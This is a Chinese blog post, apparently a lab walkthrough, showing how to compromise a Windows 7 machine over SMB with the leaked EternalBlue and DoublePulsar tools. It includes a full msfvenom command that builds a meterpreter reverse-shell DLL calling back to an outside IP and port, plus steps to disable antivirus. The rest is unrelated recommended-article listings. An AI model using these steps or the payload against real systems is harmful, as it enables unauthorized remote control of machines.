小白实验 Widows SMB 0day

最新推荐文章于 2024-03-21 09:54:55 发布
最新推荐文章于 2024-03-21 09:54:55 发布
阅读量574 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jjbanxian/article/details/70242731
版权

靶机:Windows7  445端口开放

废话不多说,开始小白的探索之路。。

         大家可以先到https://github.com/x0rz/EQGRP_Lost_in_Translation/tree/master/windows上去下载工具,下载完后解压到某个文件夹(当然你可以适当的禁止一些杀毒软件)。

         首先要对自己的电脑进行Python环境的设置,我也是看别人实验的过程,首先下载python2.6或python3.2版本(注意应当下32位的,不然后面好像会出错),因为我下的是Python2.6版本的,下面就以这个版本进行说明。可以在https://www.python.org/downloads/进行下载,我那时选的是2.6.4版本的,其他的应当都可以,下载好后,还要进行路径的配置,这个网上一搜一大堆,就不说了。接下来还要下载pywin32,可以参考http://jingyan.baidu.com/article/22fe7ced1ca36b3003617f7a.html进行下载安装(我是直接下载他红线框标的下面2.6的那个可以用),完成环境的配置后,进入到解压的文件夹,然后进入\windows这个目录下找到fb.py这个文件,将26,27,28,72行注释掉。

 

 

                

注释完以后,打开cmd,进入到fb.py文件的位置用python2.6运行文件。(之前应关闭相应的杀毒软件。。)

这一切都完成后,并且正确后应如下图所示

 

接下来按他要求的进行输入

 

 一路回车,然后使用use Eternalblue

一路回车,下图中的那个选择1

 

一路回车出现下图则表示这个模块使用成功

输入 use Doublepulsar

一路回车,选择目标机的版本


如下图所选,那个s.dll是在kail中用msf生成的一个dll文件(下面是怎样生成的),我这里是复制到E盘根目录下

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.4.115.189 lport=5555 -f dll > s.dll(要先进入‘/’目录下及cd /)


用kail中的metasploit进行相关的配置开始监听

回到cmd,一路回车,如下为成功

kail中返回一个shell

help一下,发现有很多功能。。。

screenshot截一下图

以上就是小白在机房实验的全过程。。。

大家还可以自己探索更多的功能。

以下两个网页供大家参考

http://www.myhack58.com/Article/60/63/2017/85384_2.htm

http://www.qingpingshan.com/pc/aq/253048.html

 

jjbanxian
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SMB服务漏洞MS17-010渗透测试
sinat_41880528的博客
07-03 1万+
1.MS17-010漏洞简介     MS17-010是微软Windows 系统SMB协议的漏洞。由于某些请求的处理不当,Microsoft Server Message Block 1.0(SMBv1)中存在多个远程代码执行漏洞,远程Windows主机受到以下漏洞的影响:CVE-20170143,CVE-20170144,CVE-20170145,CVE-20170146,CVE-2017014...
方程式EQGRP_Lost_in_Translation工具之fb.py
渗透测试研究中心
04-15 178
使用方法: 环境搭建:win2003下测试: 下载python2.6并安装 下载pywin32并安装 将C:\Python26添加到环境变量PATH中 将整个windows目录复制到windows2003上 对fb.py进行编辑: 将EQGRP_Lost_in_Translation下载到的文件解压,找到\windows\fb.py,将,下图中两个部分注释掉: 然后运行python fb...
探秘 EQGRP:一款强大的隐私保护工具
gitblog_00071的博客
03-21 412
探秘 EQGRP:一款强大的隐私保护工具 项目地址:https://gitcode.com/x0rz/EQGRP 项目简介 EQGRP 是一个由安全专家 x0rz 创建的开源项目,其核心目标是提供一种简单、高效的方式来保护用户的在线隐私和数据安全。该项目采用先进的加密技术和匿名网络理念,让用户能够在互联网上进行更私密的通信。 技术分析 1. 基于Signal协议 EQGRP 使用了 Signal ...
微软 SMB3 协议远程利用 0day 漏洞风险通告
安全解决方案
03-11 3690
漏洞编号和级别 2020 年 3 月 11 日 漏洞编号和级别 CVE 编号:CVE-2020-0796,危险级别:严重,CVSS 分值:官方未评定 影响版本 Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 ...
EQGRP
weixin_30768661的博客
04-28 190
https://github.com/x0rz/EQGRP 转载于:https://www.cnblogs.com/zengkefu/p/6783052.html
cmake 3.23.0 widows 安装程序
04-01
cmake 3.23.0 widows 去网站下太麻烦了。有用点个赞就行 哈哈
pysmb:pysmb是一个用Python编写的实验SMBCIFS库。 它实现了客户端SMBCIFS协议(SMB1和SMB2),该协议允许您的Python应用程序访问文件以及从SMBCIFS共享文件夹(例如Windows文件共享和Samba文件夹)中传输文件。
04-29
pysmb是一个用Python编写的实验SMB / CIFS库。 它实现了客户端SMB / CIFS协议(SMB1和SMB2),该协议允许您的Python应用程序访问文件和从SMB / CIFS共享文件夹(例如Windows文件共享和Samba文件夹)中传输文件。 ...
easyui widows桌面效果(一)
01-14
记得webQQ流行的时候,不少人都很想去做那样的后台管理,然后去网上下载各种各样的模板修改,但是那些真是你们想要的吗? 假如你的后台如果是用easyui 你再加上那些js 小跑起来还是那么顺畅吗?...
FR1 (Example)_sae_sdk_widows_1.0.4_
10-03
ngs Mode and Programmer Mode like Dicebot
widows下安装pycurl并利用pycurl请求https地址的方法
09-20
今天小编就为大家分享一篇widows下安装pycurl并利用pycurl请求https地址的方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
NSA BANK EQGRP_Lost_in_Translation-master.zip
04-07
这是github上下载的NSA网络武器,乘凉不忘栽树人,大家技术的共同提高,共享精神的保持才是最重要的!!!
Setup "EQGRP_Lost_in_Translation" Of NAS
weixin_33720956的博客
04-19 143
Setup "EQGRP_Lost_in_Translation" Of NAS 1、前言: 北京时间4月14号晚,TheShadowBrokers在steemit.com博客上放出第二波方程式组织Equation Group(为NSA提供服务专门对国外进行间谍活动的组织)的黑客工具包。有网友在github上传了相关的解密后的文件,通过简单的分析所有的解密后的文件,发现其中包括新的23个黑客工具。...
Windows系统SMB/RDP远程命令执行漏洞
热门推荐
收集盒 Book box
05-01 1万+
介于此次爆发的漏洞事件危害太过严重,本文当回搬运工,分享此次NSA方程式组织泄露的0day事件。由于信息量太过庞大,没有对其中的技术细节进行研究,不过请相信我,赶紧拔电源吧。 事件具体细节请参考:长亭科技专栏 exploit地址:https://github.com/x0rz/EQGRP_Lost_in_Translation 事件起因   2016 年 8 月有一个 “Shado
【NSA黑客工具包】Windows 0day验证实验
wodafa的博客
05-04 3158
面对这种指哪儿打哪儿的神级漏洞,锦行科技CTO.Jannock、长亭科技.Monster、腾讯玄武实验室.TK、腾讯湛泸实验室.yuange等国内相关安全专家也给出了一些想法和解决方案。微软MSRC也发布了一则风险评估公告,报告中指出微软MSRC分析了由Shadow Brokers公开提供 的大量漏洞,大多数漏洞都已经被修补。剩余的漏洞,也被验证在Windows7、Windows近期版本、Exchange2010以及Exchange较新版本中没有得到复现,不过微软MSRC强烈建议仍在使用这些产品先前版本的用
基于qt5+KDchart开发的任务计划甘特图
最新发布
06-24
基于qt5+KDchart开发的任务计划甘特图 1。可以根据任务类型、开始时间、结束时间展示任务执行长度。 2.可以动态编辑任务调整时间; 3.支持年、月、日、小时等时间缩放显示。
NAPI篇4-NAPI应用点亮一个LED
06-23
NAPI篇4-NAPI应用点亮一个LED
widows jdk8
07-22
### 回答1: JDK8是Oracle公司推出的Java开发工具包,它提供了Java开发所需的一系列工具和类库。"widows"是一个笔误,我猜测你想问的可能是"Windows"操作系统下的JDK8。 在Windows操作系统下使用JDK8进行Java开发,首先需要安装JDK8的软件包。你可以从Oracle官方网站上下载安装程序,然后按照安装向导一步一步进行安装。 安装完成后,你需要配置JDK8的环境变量。通过设置JAVA_HOME环境变量来指定JDK8的安装目录,将JDK的bin目录添加到系统的PATH环境变量中,这样系统就能找到JDK的执行文件。 使用JDK8进行Java编程时,你可以使用任何Java开发工具,比如Eclipse、IntelliJ IDEA等。只需要在开发工具中配置JDK8的路径,然后就可以使用JDK8提供的各种功能进行开发。 JDK8相比于之前的版本,引入了许多新的特性和改进。其中最具代表性的是Lambda表达式和函数式接口的支持,使得Java语言更加灵活和函数式编程更容易实现。此外,JDK8还增强了集合类库、增加了新的时间日期API、改进了并发编程等方面。 总的来说,JDK8是Java开发的重要工具,为开发者提供了丰富的功能和便利。如果你想在Windows操作系统下进行Java开发,安装和配置JDK8是必要的第一步。 ### 回答2: JDK 8是Java Development Kit的缩写,是Java编程语言的一个开发环境。而“widows”的正确拼写应为“Windows”。 JDK 8是Java SE 8版本的开发工具包,它是Java编程语言的基础,用于开发和编译Java程序。它包括了编译器、虚拟机、调试工具和其他一些必要的组件。JDK 8还包括了许多新的特性和改进,使得Java编程更加便捷和高效。 对于Windows操作系统的用户来说,widows jdk8非常重要。它允许开发人员在Windows平台上编写和运行Java应用程序。通过使用JDK 8,开发者可以利用其中的工具和库来创建各种类型的Java应用程序,如桌面应用程序、移动应用和Web应用等。 此外,JDK 8还引入了一些新的语言特性和API,如Lambda表达式、Stream API等,这些特性极大地提高了Java编程的灵活性和效率。它们使得开发者能够更加简洁地编写代码,并能更好地处理集合和并行计算等任务。 总之,widows jdk8对于Windows系统下的Java开发者来说非常重要。它提供了完整的工具和环境,使得开发者能够轻松地编写、编译和运行Java应用程序。同时,JDK 8还引入了许多新的特性和改进,提升了Java编程的效率和灵活性。由于字数限制,以上只是对widows jdk8的简要说明。 ### 回答3: JDK(Java Development Kit)是Java开发工具包,而JDK 8是Java开发工具包的第8个主要版本。 widows JDK 8是指在Windows操作系统上安装和使用JDK 8进行Java开发。JDK 8包含了一系列的工具和库,供开发人员使用和编写Java程序。 使用JDK 8进行Java开发有许多优势。首先,JDK 8引入了许多新的特性和改进,例如lambda表达式、函数式接口、Stream API等,这些新特性使得Java开发更加简洁、灵活,并且增强了代码的可读性和可维护性。 其次,JDK 8对性能进行了优化和改进,使得Java应用程序在执行速度和内存消耗方面有明显的提升。特别是在多核处理器系统上,JDK 8的并行处理能力更强,可以更好地利用硬件资源。 此外,JDK 8还提供了丰富的开发工具和库,包括编译器、调试器、性能分析器等,这些工具可以帮助开发人员更加高效地编写、调试和优化Java代码。 总而言之,widows JDK 8是一套用于Windows操作系统上的Java开发工具,它提供了丰富的特性、优化的性能和强大的开发工具,使得Java开发变得更加轻松、高效和可靠。它是Java开发人员的不可或缺的选择之一。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值